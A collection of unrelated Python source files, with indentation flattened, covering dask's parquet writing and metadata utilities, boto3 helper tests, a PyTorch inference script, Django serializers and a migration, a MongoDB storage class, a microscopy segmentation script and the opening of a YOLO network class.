of pyarrow types can be specified (e.g. `schema={"id": pa.string()}`).
For this case, fields excluded from the dictionary will be inferred
from `_meta_nonempty`. If "infer", the first non-empty and non-null
partition will be used to infer the type for "object" columns. If
None (default), we let the backend infer the schema for each distinct
output partition. If the partitions produce inconsistent schemas,
pyarrow will throw an error when writing the shared _metadata file.
Note that this argument is ignored by the "fastparquet" engine.
**kwargs :
Extra options to be passed on to the specific backend.
Examples
--------
>>> df = dd.read_csv(...) # doctest: +SKIP
>>> df.to_parquet('/path/to/output/', ...) # doctest: +SKIP
See Also
--------
read_parquet: Read parquet data to dask.dataframe
"""
if compression == "default":
if snappy is not None:
compression = "snappy"
else:
compression = None
partition_on = partition_on or []
if isinstance(partition_on, str):
partition_on = [partition_on]
if set(partition_on) - set(df.columns):
raise ValueError(
"Partitioning on non-existent column. "
"partition_on=%s ."
"columns=%s" % (str(partition_on), str(list(df.columns)))
)
if isinstance(engine, str):
engine = get_engine(engine)
if hasattr(path, "name"):
path = stringify_path(path)
fs, _, _ = get_fs_token_paths(path, mode="wb", storage_options=storage_options)
# Trim any protocol information from the path before forwarding
path = fs._strip_protocol(path)
if overwrite:
if isinstance(fs, LocalFileSystem):
working_dir = fs.expand_path(".")[0]
if path.rstrip("/") == working_dir.rstrip("/"):
raise ValueError(
"Cannot clear the contents of the current working directory!"
)
if append:
raise ValueError("Cannot use both `overwrite=True` and `append=True`!")
if fs.isdir(path):
# Only remove path contents if
# (1) The path exists
# (2) The path is a directory
# (3) The path is not the current working directory
fs.rm(path, recursive=True)
# Save divisions and corresponding index name. This is necessary,
# because we may be resetting the index to write the file
division_info = {"divisions": df.divisions, "name": df.index.name}
if division_info["name"] is None:
# As of 0.24.2, pandas will rename an index with name=None
# when df.reset_index() is called. The default name is "index",
# but dask will always change the name to the NONE_LABEL constant
if NONE_LABEL not in df.columns:
division_info["name"] = NONE_LABEL
elif write_index:
raise ValueError(
"Index must have a name if __null_dask_index__ is a column."
)
else:
warnings.warn(
"If read back by Dask, column named __null_dask_index__ "
"will be set to the index (and renamed to None)."
)
# There are some "resrved" names that may be used as the default column
# name after resetting the index. However, we don't want to treat it as
# a "special" name if the string is already used as a "real" column name.
reserved_names = []
for name in ["index", "level_0"]:
if name not in df.columns:
reserved_names.append(name)
# If write_index==True (default), reset the index and record the
# name of the original index in `index_cols` (we will set the name
# to the NONE_LABEL constant if it is originally `None`).
# `fastparquet` will use `index_cols` to specify the index column(s)
# in the metadata. `pyarrow` will revert the `reset_index` call
# below if `index_cols` is populated (because pyarrow will want to handle
# index preservation itself). For both engines, the column index
# will be written to "pandas metadata" if write_index=True
index_cols = []
if write_index:
real_cols = set(df.columns)
none_index = list(df._meta.index.names) == [None]
df = df.reset_index()
if none_index:
df.columns = [
c if c not in reserved_names else NONE_LABEL for c in df.columns
]
index_cols = [c for c in set(df.columns) - real_cols]
else:
# Not writing index - might as well drop it
df = df.reset_index(drop=True)
_to_parquet_kwargs = {
"engine",
"compression",
"write_index",
"append",
"ignore_divisions",
"partition_on",
"storage_options",
"write_metadata_file",
"compute",
}
kwargs_pass = {k: v for k, v in kwargs.items() if k not in _to_parquet_kwargs}
# Engine-specific initialization steps to write the dataset.
# Possibly create parquet metadata, and load existing stuff if appending
meta, schema, i_offset = engine.initialize_write(
df,
fs,
path,
append=append,
ignore_divisions=ignore_divisions,
partition_on=partition_on,
division_info=division_info,
index_cols=index_cols,
schema=schema,
**kwargs_pass,
)
# Use i_offset and df.npartitions to define file-name list
filenames = ["part.%i.parquet" % (i + i_offset) for i in range(df.npartitions)]
# Construct IO graph
dsk = {}
name = "to-parquet-" + tokenize(
df,
fs,
path,
append,
ignore_divisions,
partition_on,
division_info,
index_cols,
schema,
)
part_tasks = []
kwargs_pass["fmd"] = meta
kwargs_pass["compression"] = compression
kwargs_pass["index_cols"] = index_cols
kwargs_pass["schema"] = schema
if custom_metadata:
if b"pandas" in custom_metadata.keys():
raise ValueError(
"User-defined key/value metadata (custom_metadata) can not "
"contain a b'pandas' key. This key is reserved by Pandas, "
"and overwriting the corresponding value can render the "
"entire dataset unreadable."
)
kwargs_pass["custom_metadata"] = custom_metadata
for d, filename in enumerate(filenames):
dsk[(name, d)] = (
apply,
engine.write_partition,
[
(df._name, d),
path,
fs,
filename,
partition_on,
write_metadata_file,
],
toolz.merge(kwargs_pass, {"head": True}) if d == 0 else kwargs_pass,
)
part_tasks.append((name, d))
final_name = "metadata-" + name
# Collect metadata and write _metadata
if write_metadata_file:
dsk[(final_name, 0)] = (
apply,
engine.write_metadata,
[
part_tasks,
meta,
fs,
path,
],
{"append": append, "compression": compression},
)
else:
dsk[(final_name, 0)] = (lambda x: None, part_tasks)
graph = HighLevelGraph.from_collections(name, dsk, dependencies=[df])
out = Scalar(graph, final_name, "")
if compute:
if compute_kwargs is None:
compute_kwargs = dict()
out = out.compute(**compute_kwargs)
return out
def create_metadata_file(
paths,
root_dir=None,
out_dir=None,
engine="pyarrow",
storage_options=None,
split_every=32,
compute=True,
compute_kwargs=None,
fs=None,
):
"""Construct a global _metadata file from a list of parquet files.
Dask's read_parquet function is designed to leverage a global
_metadata file whenever one is available. The to_parquet
function will generate this file automatically by default, but it
may not exist if the dataset was generated outside of Dask. This
utility provides a mechanism to generate a _metadata file from a
list of existing parquet files.
NOTE: This utility is not yet supported for the "fastparquet" engine.
Parameters
----------
paths : list(string)
List of files to collect footer metadata from.
root_dir : string, optional
Root directory of dataset. The `file_path` fields in the new
_metadata file will relative to this directory. If None, a common
root directory will be inferred.
out_dir : string or False, optional
Directory location to write the final _metadata file. By default,
this will be set to `root_dir`. If False is specified, the global
metadata will be returned as an in-memory object (and will not be
written to disk).
engine : str or Engine, default 'pyarrow'
Parquet Engine to use. Only 'pyarrow' is supported if a string
is passed.
storage_options : dict, optional
Key/value pairs to be passed on to the file-system backend, if any.
split_every : int, optional
The final metadata object that is written to _metadata can be much
smaller than the list of footer metadata. In order to avoid the
aggregation of all metadata within a single task, a tree reduction
is used. This argument specifies the maximum number of metadata
inputs to be handled by any one task in the tree. Defaults to 32.
compute : bool, optional
If True (default) then the result is computed immediately. If False
then a ``dask.delayed`` object is returned for future computation.
compute_kwargs : dict, optional
Options to be passed in to the compute method
fs : fsspec object, optional
File-system instance to use for file handling. If prefixes have
been removed from the elements of ``paths`` before calling this
function, an ``fs`` argument must be provided to ensure correct
behavior on remote file systems ("naked" paths cannot be used
to infer file-system information).
"""
# Get engine.
# Note that "fastparquet" is not yet supported
if isinstance(engine, str):
if engine not in ("pyarrow", "arrow"):
raise ValueError(
f"{engine} is not a supported engine for create_metadata_file "
"Try engine='pyarrow'."
)
engine = get_engine(engine)
# Process input path list
if fs is None:
# Only do this if an fsspec file-system object is not
# already defined. The prefixes may already be stripped.
fs, _, paths = get_fs_token_paths(
paths, mode="rb", storage_options=storage_options
)
ap_kwargs = {"root": root_dir} if root_dir else {}
paths, root_dir, fns = _sort_and_analyze_paths(paths, fs, **ap_kwargs)
out_dir = root_dir if out_dir is None else out_dir
# Start constructing a raw graph
dsk = {}
name = "gen-metadata-" + tokenize(paths, fs)
collect_name = "collect-" + name
agg_name = "agg-" + name
# Define a "collect" task for each file in the input list.
# Each tasks will:
# 1. Extract the footer metadata from a distinct file
# 2. Populate the `file_path` field in the metadata
# 3. Return the extracted/modified metadata
for p, (fn, path) in enumerate(zip(fns, paths)):
key = (collect_name, p, 0)
dsk[key] = (engine.collect_file_metadata, path, fs, fn)
# Build a reduction tree to aggregate all footer metadata
# into a single metadata object. Each task in the tree
# will take in a list of metadata objects as input, and will
# usually output a single (aggregated) metadata object.
# The final task in the tree will write the result to disk
# instead of returning it (this behavior is triggered by
# passing a file path to `engine.aggregate_metadata`).
parts = len(paths)
widths = [parts]
while parts > 1:
parts = math.ceil(parts / split_every)
widths.append(parts)
height = len(widths)
for depth in range(1, height):
for group in range(widths[depth]):
p_max = widths[depth - 1]
lstart = split_every * group
lstop = min(lstart + split_every, p_max)
dep_task_name = collect_name if depth == 1 else agg_name
node_list = [(dep_task_name, p, depth - 1) for p in range(lstart, lstop)]
if depth == height - 1:
assert group == 0
dsk[name] = (engine.aggregate_metadata, node_list, fs, out_dir)
else:
dsk[(agg_name, group, depth)] = (
engine.aggregate_metadata,
node_list,
None,
None,
)
# There will be no aggregation tasks if there is only one file
if len(paths) == 1:
dsk[name] = (engine.aggregate_metadata, [(collect_name, 0, 0)], fs, out_dir)
# Convert the raw graph to a `Delayed` object
graph = HighLevelGraph.from_collections(name, dsk, dependencies=[])
out = Delayed(name, graph)
# Optionally compute the result
if compute:
if compute_kwargs is None:
compute_kwargs = dict()
out = out.compute(**compute_kwargs)
return out
_ENGINES = {}
def get_engine(engine):
"""Get the parquet engine backend implementation.
Parameters
----------
engine : str, default 'auto'
Backend parquet library to use. Options include: 'auto', 'fastparquet',
'pyarrow', 'pyarrow-dataset', and 'pyarrow-legacy'. Defaults to 'auto',
which selects the FastParquetEngine if fastparquet is installed (and
ArrowLegacyEngine otherwise). If 'pyarrow-dataset' is specified, the
ArrowDatasetEngine (which leverages the pyarrow.dataset API) will be used
for newer PyArrow versions (>=1.0.0). If 'pyarrow' or 'pyarrow-legacy' are
specified, the ArrowLegacyEngine will be used (which leverages the
pyarrow.parquet.ParquetDataset API).
NOTE: 'pyarrow-dataset' enables row-wise filtering, but requires
pyarrow>=1.0. The behavior of 'pyarrow' will most likely change to
ArrowDatasetEngine in a future release, and the 'pyarrow-legacy'
option will be deprecated once the ParquetDataset API is deprecated.
gather_statistics : bool or None (default).
Returns
-------
A dict containing a ``'read'`` and ``'write'`` function.
"""
if engine in _ENGINES:
return _ENGINES[engine]
if engine == "auto":
for eng in ["fastparquet", "pyarrow"]:
try:
return get_engine(eng)
except RuntimeError:
pass
else:
raise RuntimeError("Please install either fastparquet or pyarrow")
elif engine == "fastparquet":
import_required("fastparquet", "`fastparquet` not installed")
from .fastparquet import FastParquetEngine
_ENGINES["fastparquet"] = eng = FastParquetEngine
return eng
elif engine in ("pyarrow", "arrow", "pyarrow-legacy", "pyarrow-dataset"):
if engine == "pyarrow-dataset":
from .arrow import ArrowDatasetEngine
_ENGINES[engine] = eng = ArrowDatasetEngine
else:
from .arrow import ArrowLegacyEngine
_ENGINES[engine] = eng = ArrowLegacyEngine
return eng
else:
raise ValueError(
'Unsupported engine: "{0}".'.format(engine)
+ ' Valid choices include "pyarrow" and "fastparquet".'
)
#####################
# Utility Functions #
#####################
def sorted_columns(statistics):
"""Find sorted columns given row-group statistics
This finds all columns that are sorted, along with appropriate divisions
values for those columns
Returns
-------
out: List of {'name': str, 'divisions': List[str]} dictionaries
"""
if not statistics:
return []
out = []
for i, c in enumerate(statistics[0]["columns"]):
if not all(
"min" in s["columns"][i] and "max" in s["columns"][i] for s in statistics
):
continue
divisions = [c["min"]]
max = c["max"]
success = c["min"] is not None
for stats in statistics[1:]:
c = stats["columns"][i]
if c["min"] is None:
success = False
break
if c["min"] >= max:
divisions.append(c["min"])
max = c["max"]
else:
success = False
break
if success:
divisions.append(max)
assert divisions == sorted(divisions)
out.append({"name": c["name"], "divisions": divisions})
return out
def apply_filters(parts, statistics, filters):
"""Apply filters onto parts/statistics pairs
Parameters
----------
parts: list
Tokens corresponding to row groups to read in the future
statistics: List[dict]
List of statistics for each part, including min and max values
filters: Union[List[Tuple[str, str, Any]], List[List[Tuple[str, str, Any]]]]
List of filters to apply, like ``[[('x', '=', 0), ...], ...]``. This
implements partition-level (hive) filtering only, i.e., to prevent the
loading of some row-groups and/or files.
Predicates can be expressed in disjunctive normal form (DNF). This means
that the innermost tuple describes a single column predicate. These
inner predicates are combined with an AND conjunction into a larger
predicate. The outer-most list then combines all of the combined
filters with an OR disjunction.
Predicates can also be expressed as a List[Tuple]. These are evaluated
as an AND conjunction. To express OR in predictates, one must use the
(preferred) List[List[Tuple]] notation.
Note that the "fastparquet" engine does not currently support DNF for
the filtering of partitioned columns (List[Tuple] is required).
Returns
-------
parts, statistics: the same as the input, but possibly a subset
"""
def apply_conjunction(parts, statistics, conjunction):
for column, operator, value in conjunction:
out_parts = []
out_statistics = []
for part, stats in zip(parts, statistics):
if "filter" in stats and stats["filter"]:
continue # Filtered by engine
try:
c = toolz.groupby("name", stats["columns"])[column][0]
min = c["min"]
max = c["max"]
except KeyError:
out_parts.append(part)
out_statistics.append(stats)
else:
if (
operator == "=="
and min <= value <= max
or operator == "<"
and min < value
or operator == "<="
and min <= value
or operator == ">"
and max > value
or operator == ">="
and max >= value
or operator == "in"
and any(min <= item <= max for item in value)
):
out_parts.append(part)
out_statistics.append(stats)
parts, statistics = out_parts, out_statistics
return parts, statistics
conjunction, *disjunction = filters if isinstance(filters[0], list) else [filters]
out_parts, out_statistics = apply_conjunction(parts, statistics, conjunction)
for conjunction in disjunction:
for part, stats in zip(*apply_conjunction(parts, statistics, conjunction)):
if part not in out_parts:
out_parts.append(part)
out_statistics.append(stats)
return out_parts, out_statistics
def process_statistics(
parts,
statistics,
filters,
index,
chunksize,
split_row_groups,
fs,
aggregation_depth,
):
"""Process row-group column statistics in metadata
Used in read_parquet.
"""
index_in_columns = False
if statistics:
result = list(
zip(
*[
(part, stats)
for part, stats in zip(parts, statistics)
if stats["num-rows"] > 0
]
)
)
parts, statistics = result or [[], []]
if filters:
parts, statistics = apply_filters(parts, statistics, filters)
# Aggregate parts/statistics if we are splitting by row-group
if chunksize or (split_row_groups and int(split_row_groups) > 1):
parts, statistics = aggregate_row_groups(
parts, statistics, chunksize, split_row_groups, fs, aggregation_depth
)
out = sorted_columns(statistics)
if index and isinstance(index, str):
index = [index]
if index and out:
# Only one valid column
out = [o for o in out if o["name"] in index]
if index is not False and len(out) == 1:
# Use only sorted column with statistics as the index
divisions = out[0]["divisions"]
if index is None:
index_in_columns = True
index = [out[0]["name"]]
elif index != [out[0]["name"]]:
raise ValueError("Specified index is invalid.\nindex: {}".format(index))
elif index is not False and len(out) > 1:
if any(o["name"] == NONE_LABEL for o in out):
# Use sorted column matching NONE_LABEL as the index
[o] = [o for o in out if o["name"] == NONE_LABEL]
divisions = o["divisions"]
if index is None:
index = [o["name"]]
index_in_columns = True
elif index != [o["name"]]:
raise ValueError(
"Specified index is invalid.\nindex: {}".format(index)
)
else:
# Multiple sorted columns found, cannot autodetect the index
warnings.warn(
"Multiple sorted columns found %s, cannot\n "
"autodetect index. Will continue without an index.\n"
"To pick an index column, use the index= keyword; to \n"
"silence this warning use index=False."
"" % [o["name"] for o in out],
RuntimeWarning,
)
index = False
divisions = [None] * (len(parts) + 1)
else:
divisions = [None] * (len(parts) + 1)
else:
divisions = [None] * (len(parts) + 1)
return parts, divisions, index, index_in_columns
def set_index_columns(meta, index, columns, index_in_columns, auto_index_allowed):
"""Handle index/column arguments, and modify `meta`
Used in read_parquet.
"""
ignore_index_column_intersection = False
if columns is None:
# User didn't specify columns, so ignore any intersection
# of auto-detected values with the index (if necessary)
ignore_index_column_intersection = True
# Do not allow "un-named" fields to be read in as columns.
# These were intended to be un-named indices at write time.
_index = index or []
columns = [
c for c in meta.columns if c not in (None, NONE_LABEL) or c in _index
]
if not set(columns).issubset(set(meta.columns)):
raise ValueError(
"The following columns were not found in the dataset %s\n"
"The following columns were found %s"
% (set(columns) - set(meta.columns), meta.columns)
)
if index:
if isinstance(index, str):
index = [index]
if isinstance(columns, str):
columns = [columns]
if ignore_index_column_intersection:
columns = [col for col in columns if col not in index]
if set(index).intersection(columns):
if auto_index_allowed:
raise ValueError(
"Specified index and column arguments must not intersect"
" (set index=False or remove the detected index from columns).\n"
"index: {} | column: {}".format(index, columns)
)
else:
raise ValueError(
"Specified index and column arguments must not intersect.\n"
"index: {} | column: {}".format(index, columns)
)
# Leaving index as a column in `meta`, because the index
# will be reset below (in case the index was detected after
# meta was created)
if index_in_columns:
meta = meta[columns + index]
else:
meta = meta[columns]
else:
meta = meta[list(columns)]
return meta, index, columns
def aggregate_row_groups(
parts, stats, chunksize, split_row_groups, fs, aggregation_depth
):
if not stats[0].get("file_path_0", None):
return parts, stats
parts_agg = []
stats_agg = []
use_row_group_criteria = split_row_groups and int(split_row_groups) > 1
use_chunksize_criteria = bool(chunksize)
if use_chunksize_criteria:
chunksize = parse_bytes(chunksize)
next_part, next_stat = [parts[0].copy()], stats[0].copy()
for i in range(1, len(parts)):
stat, part = stats[i], parts[i]
# Criteria #1 for aggregating parts: parts are within the same file
same_path = stat["file_path_0"] == next_stat["file_path_0"]
multi_path_allowed = False
if aggregation_depth:
# Criteria #2 for aggregating parts: The part does not include
# row-group information, or both parts include the same kind
# of row_group aggregation (all None, or all indices)
multi_path_allowed = len(part["piece"]) == 1
if not (same_path or multi_path_allowed):
rgs = set(list(part["piece"][1]) + list(next_part[-1]["piece"][1]))
multi_path_allowed = (rgs == {None}) or (None not in rgs)
# Criteria #3 for aggregating parts: The parts share a
# directory at the "depth" allowed by `aggregation_depth`
if not same_path and multi_path_allowed:
if aggregation_depth is True:
multi_path_allowed = True
elif isinstance(aggregation_depth, int):
# Make sure files share the same directory
root = stat["file_path_0"].split(fs.sep)[:-aggregation_depth]
next_root = next_stat["file_path_0"].split(fs.sep)[
:-aggregation_depth
]
multi_path_allowed = root == next_root
else:
raise ValueError(
f"{aggregation_depth} not supported for `aggregation_depth`"
)
def _check_row_group_criteria(stat, next_stat):
if use_row_group_criteria:
return (next_stat["num-row-groups"] + stat["num-row-groups"]) <= int(
split_row_groups
)
else:
return False
def _check_chunksize_criteria(stat, next_stat):
if use_chunksize_criteria:
return (
next_stat["total_byte_size"] + stat["total_byte_size"]
) <= chunksize
else:
return False
stat["num-row-groups"] = stat.get("num-row-groups", 1)
next_stat["num-row-groups"] = next_stat.get("num-row-groups", 1)
if (same_path or multi_path_allowed) and (
(
_check_row_group_criteria(stat, next_stat)
or _check_chunksize_criteria(stat, next_stat)
)
):
# Update part list
next_part.append(part)
# Update Statistics
next_stat["total_byte_size"] += stat["total_byte_size"]
next_stat["num-rows"] += stat["num-rows"]
next_stat["num-row-groups"] += stat["num-row-groups"]
for col, col_add in zip(next_stat["columns"], stat["columns"]):
if col["name"] != col_add["name"]:
raise ValueError("Columns are different!!")
if "min" in col:
col["min"] = min(col["min"], col_add["min"])
if "max" in col:
col["max"] = max(col["max"], col_add["max"])
else:
parts_agg.append(next_part)
stats_agg.append(next_stat)
next_part, next_stat = [part.copy()], stat.copy()
parts_agg.append(next_part)
stats_agg.append(next_stat)
return parts_agg, stats_agg
DataFrame.to_parquet.__doc__ = to_parquet.__doc__
|
from unittest import TestCase
from boto3_utils import (
dict_to_key_value,
key_value_to_dict,
snake_to_camel_case,
make_tag_dict,
)
class TestSnakeToCamelCase(TestCase):
"""Test Suite for snake_to_camel_case function."""
def setUp(self):
self.answers = {'http_response':'HTTPResponse'}
def test_name_cidr_block(self):
self.assertEqual(
snake_to_camel_case('cidr_block'),
'CidrBlock'
)
def test_name_http_response(self):
# this tests a short circut of answers.
self.assertEqual(
snake_to_camel_case('http_response', answers=self.answers),
'HTTPResponse'
)
def test_name_vpc_id(self):
self.assertEqual(
snake_to_camel_case('vpc_id'),
'VpcId'
)
class TestMakeTagDict(TestCase):
def setUp(self):
class TestSubject(object):
tags = [
{'Key':'Name', 'Value':'myapp01-web01'},
{'Key':'role', 'Value':'web'},
]
self.test_obj = TestSubject
def test_make_tag_dict(self):
tags = make_tag_dict(self.test_obj.tags)
self.assertIn('Name', tags)
self.assertIn('role', tags)
self.assertEqual(tags['Name'], 'myapp01-web01')
self.assertEqual(tags['role'], 'web')
class TestDictToKeyValue(TestCase):
def test_dict_to_key_value(self):
data = {'key1':'value1','key2':'value2'}
pretty_str = dict_to_key_value(data)
self.assertIn('key1=value1', pretty_str)
self.assertIn('key2=value2', pretty_str)
self.assertEqual(pretty_str.count(','), 1)
not_as_pretty = dict_to_key_value(data,'x','x')
self.assertEqual(not_as_pretty.count('x'), 3)
def test_key_value_to_dict(self):
key_value_list = ['a=1,b=2', 'c=3, d=4', 'e=5']
desired_result = {'a':'1', 'b':'2', 'c':'3', 'd':'4', 'e':'5'}
self.assertEqual(key_value_to_dict(key_value_list), desired_result)
|
import torch
import torch.nn as nn
import os
from torch.autograd import Variable
import argparse
from model.resnet import resnet101
from dataset.My_Test import MyTest
parser = argparse.ArgumentParser()
parser.add_argument('--num_workers', type=int, default=2)
parser.add_argument('--batchSize', type=int, default=8)
parser.add_argument('--epochs', type=int, default=1, help='number of epochs to train for')
parser.add_argument('--lr', type=float, default=0.0002, help='learning rate, default=0.0002')
parser.add_argument('--gpu', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')
opt = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = opt.gpu
test_set = MyTest('./data/MyImage/', transform=True, test=True)
test_loader = torch.utils.data.DataLoader(test_set, batch_size=opt.batchSize, shuffle=False, num_workers=opt.num_workers)
model = resnet101(pretrained=True)
model.fc = nn.Linear(2048, 2)
model.load_state_dict(torch.load('./ckp/model.pth'))
model.cuda()
model.eval()
def main():
with torch.no_grad():
for image in test_loader:
image = Variable(image.cuda())
out = model(image)
_, predicted = torch.max(out.data, 1)
predicted = predicted.data.cpu().numpy().tolist()
print(predicted)
if __name__ == '__main__':
main()
|
USER_NAME = ''
USER_PWD = ''
|
from rest_framework import serializers
from core.models import Category, Article, Comment
from user.serializers import UserSerializer
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = ('id', 'title', 'slug')
read_only_fields = ('id',)
class AbbreviateCommentSerializer(serializers.ModelSerializer):
author = UserSerializer(read_only=True)
class Meta:
model = Comment
fields = ('id', 'body', 'author', 'created_on')
read_only_fields = ('id', 'author')
class ArticleAddLikeSerializer(serializers.ModelSerializer):
class Meta:
model = Article
fields = ('id', 'like')
read_only_fields = ('id',)
def save(self):
user = self.validated_data.get('like')[0]
if self.context.get('request').method == 'DELETE':
like = self.instance.like.remove(user)
return like
like = self.instance.like.add(user)
class ArticleSerializer(serializers.ModelSerializer):
class Meta:
model = Article
fields = ('id', 'title', 'description', 'slug', 'owner', 'categories', 'publish_date', 'like')
read_only_fields = ('id', 'owner')
class ArticleDetailSerializer(serializers.ModelSerializer):
categories = CategorySerializer(many=True, read_only=True)
comments = AbbreviateCommentSerializer(many=True, read_only=True)
class Meta:
model = Article
fields = ('id', 'title', 'description', 'slug', 'owner', 'categories', 'publish_date', 'comments', 'like')
read_only_fields = ('id', 'owner')
class CommentSerializer(serializers.ModelSerializer):
class Meta:
model = Comment
fields = ('id', 'article', 'body', 'author', 'created_on')
read_only_fields = ('id', 'author')
class CommentDetailSerializer(CommentSerializer):
article = ArticleDetailSerializer(read_only=True)
author = UserSerializer(read_only=True)
class ArticleImageSerializer(serializers.ModelSerializer):
class Meta:
model = Article
fields = ('id', 'image')
read_only_fields = ('id',)
|
# -*- coding: utf-8 -*-
__author__ = 'Meanwhile'
import pymongo
import Constants
#create dabases use vk_parser
#loc : [ <longitude> , <latitude> ]
'''
СОздать индекс на дату
'''
class ProvaderStorage:
def __init__(self):
self.client = pymongo.MongoClient(Constants.Constants.getMongoServer(),
Constants.Constants.getMongoPort())
self.db = self.client['vk_parser'];
def searchByDate(self, collection, date):
return self.db[collection].find({"date": date})
def add(self, collection, lat, lng, date):
self.db[collection].insert({
"loc": [lng, lat],
"date":date
})
def findAll(self, collection):
return self.db[collection].find()
def deleteCollections(self, collection):
""" Удаляет выбранную коллекцию
:param collection имя коллекции
:type string
"""
self.db[collection].remove()
|
import logging
import pathlib
from types import SimpleNamespace
import click
import parse
import dtoolcore
import skimage.measure
import pandas as pd
from dtoolbioimage import Image as dbiImage
from fishtools.config import Config
from fishtools.data import DataLoader, get_specs
from fishtools.segment import segmentation_from_nuclear_channel_and_markers, segmentation_from_cellmask_and_label_image, scale_segmentation, filter_segmentation_by_region_list
from fishtools.vis import visualise_counts
from fishtools.probes import get_counts_by_cell
logger = logging.getLogger("fishtools")
def get_filtered_segmentation(dataitem, params):
nuc_label_image = segmentation_from_nuclear_channel_and_markers(
dataitem.fishimage,
skimage.measure.label(dataitem.scaled_markers),
params
)
nuc_label_image.pretty_color_image.view(dbiImage).save("nuc_label_img.png")
segmentation = segmentation_from_cellmask_and_label_image(
dataitem.cell_mask(params),
nuc_label_image
)
scaled_good_mask = scale_segmentation(dataitem.good_mask, dataitem.maxproj)
labelled_points = skimage.measure.label(scaled_good_mask)
rprops = skimage.measure.regionprops(labelled_points)
region_centroids = [r.centroid for r in rprops]
icentroids = [(int(r), int(c)) for r, c in region_centroids]
good_regions = [segmentation[r, c] for r, c in icentroids]
filtered_segmentation = filter_segmentation_by_region_list(
segmentation,
good_regions
)
return filtered_segmentation
def process_dataitem(dataitem, spec, params, config, output_ds):
probe_locs = dataitem.probe_locs_2d(params.probethresh)
filtered_segmentation = get_filtered_segmentation(dataitem, params)
vis = visualise_counts(
dataitem.maxproj,
filtered_segmentation,
probe_locs
)
# FIXME
output_fname = "vis{expid}.png".format(**spec)
image_abspath = output_ds.prepare_staging_abspath_promise(f"images/{output_fname}")
vis.save(image_abspath)
areas_by_cell = {
l: int(filtered_segmentation.rprops[l].area)
for l in filtered_segmentation.labels
}
counts_by_cell = get_counts_by_cell(filtered_segmentation, probe_locs)
measurements = [
{
"label": l,
"pixelarea": areas_by_cell[l],
"probecount": counts_by_cell[l]
}
for l in areas_by_cell
]
df = pd.DataFrame(measurements)
# FIXME
csv_output_fname = "results{expid}.csv".format(**spec)
csv_abspath = output_ds.prepare_staging_abspath_promise(f"csv/{csv_output_fname}")
df.to_csv(csv_abspath, index=False)
return df
def diagnostics(dataitem, spec, config, params):
import os
import numpy as np
from fishtools.segment import nuc_cell_mask_from_fishimage
import skimage.measure
from dtoolbioimage import scale_to_uint8
ncm = nuc_cell_mask_from_fishimage(dataitem.fishimage, params)
ncm.view(dbiImage).save("ncm.png")
template = "{expid}-{expid}.png"
# template = "{expid}-good.png"
fname = template.format(**spec)
fpath = os.path.join(config.annotation_dirpath, fname)
im = dbiImage.from_file(fpath)
# template = "{expid}-{expid}.png"
template = "{expid}-good.png"
fname = template.format(**spec)
fpath = os.path.join(config.annotation_dirpath, fname)
imgood = dbiImage.from_file(fpath)
im.save("floop.png")
print(im[0, 0, :])
print(im[480, 360, :])
regionim = (im[:,:,3] == 255)
r = skimage.measure.regionprops(skimage.measure.label(regionim))[0]
rmin, cmin, rmax, cmax = r.bbox
sliceme = np.s_[rmin:rmax,cmin:cmax]
imgood[sliceme].save("SLIGAES.png")
dataitem.scaled_markers.view(dbiImage).save("scaled_markers.png")
rdim, cdim = dataitem.maxproj.shape
canvas = np.dstack(3 * [scale_to_uint8(dataitem.maxproj)])
canvas[np.where(dataitem.scaled_markers)] = 0, 255, 0
canvas.view(dbiImage).save("canvas.png")
@click.command()
@click.argument('config_fpath')
def main(config_fpath):
logging.basicConfig(level=logging.INFO)
config = Config(config_fpath)
params = SimpleNamespace(**config.params)
dl = DataLoader(config.raw_config)
all_specs = get_specs(config)
import random
# specs = random.sample(all_specs, 10)
specs = all_specs
# print(specs)
# import sys; sys.exit(0)
# print(specs)
# from dtoolbioimage import ImageDataSet
# ids = ImageDataSet(config.ids_uri)
# print(ids.all_possible_stack_tuples())
# specs = get_specs(config)
# spec = specs[0]
# df = dl.load_by_specifier(**spec)
from fishtools.data import load_multiannotation_di
from dtoolbioimage import Image as dbiImage
# TODO - some visual info dumping
# di = load_wubbly(config, specs[0])
# diagnostics(di, specs[0], config, params)
# di.maxproj.view(dbiImage).save("max.png")
# filt = get_filtered_segmentation(di, params)
# filt.pretty_color_image.view(dbiImage).save("seg.png")
# process_dataitem(di, spec, params, config, None)
readme_str = config.as_readme_format()
dfs = []
with dtoolcore.DataSetCreator(
config.output_name,
config.output_base_uri
) as output_ds:
for spec in specs:
# FIXME
logger.info("Processing n={expid}".format(**spec))
try:
# dataitem = dl.load_by_specifier(**spec)
# FIXME - naming!
dataitem = load_multiannotation_di(config, spec)
df = process_dataitem(dataitem, spec, params, config, output_ds)
df['expid'] = spec['expid']
dfs.append(df)
except FileNotFoundError as err:
logger.warning(f"Couldn't load: {err}")
summary_output_abspath = output_ds.prepare_staging_abspath_promise(f"summary.csv")
pd.concat(dfs).to_csv(summary_output_abspath, index=False)
output_ds.put_readme(readme_str)
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-27 11:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('utils', '0008_auto_20160524_1436'),
]
operations = [
migrations.AddField(
model_name='channel',
name='type',
field=models.CharField(choices=[(b'WEATHER_STATION', b'Weather Station'), (b'RIVER_DEPTH', b'River Depth'), (b'RAINFALL_TEMP', b'Rainfall and Temp'), (b'DEPTH_TEMP', b'River Depth and Temp')], default=b'Weather Station', max_length=50),
),
]
|
import ResModel
import tensorflow as tf
import numpy as np
import re
from yolo.net.net import Net
class YoloTinyNet(Net):
def __init__(self, common_params, net_params, test=False):
"""
common params: a params dict
net_params : a params dict
"""
super(YoloTinyNet, self).__init__(common_params, net_params)
#process params
self.image_size = int(common_params['image_size'])
self.num_classes = int(common_params['num_classes'])
self.cell_size = int(net_params['cell_size'])
self.boxes_per_cell = int(net_params['boxes_per_cell'])
self.batch_size = int(common_params['batch_size'])
self.weight_decay = float(net_params['weight_decay'])
if not test:
self.object_scale = float(net_params['object_scale'])
self.noobject_scale = float(net_params['noobject_scale'])
self.class_scale = float(net_params['class_scale'])
self.coord_scale = float(net_params['coord_scale'])
def inference(self, images):
"""Build the yolo model
Args:
images: 4-D tensor [batch_size, image_height, image_width, channels]
Returns:
predicts: 4-D tensor [batch_size, cell_size, cell_size, num_classes + 5 * boxes_per_cell]
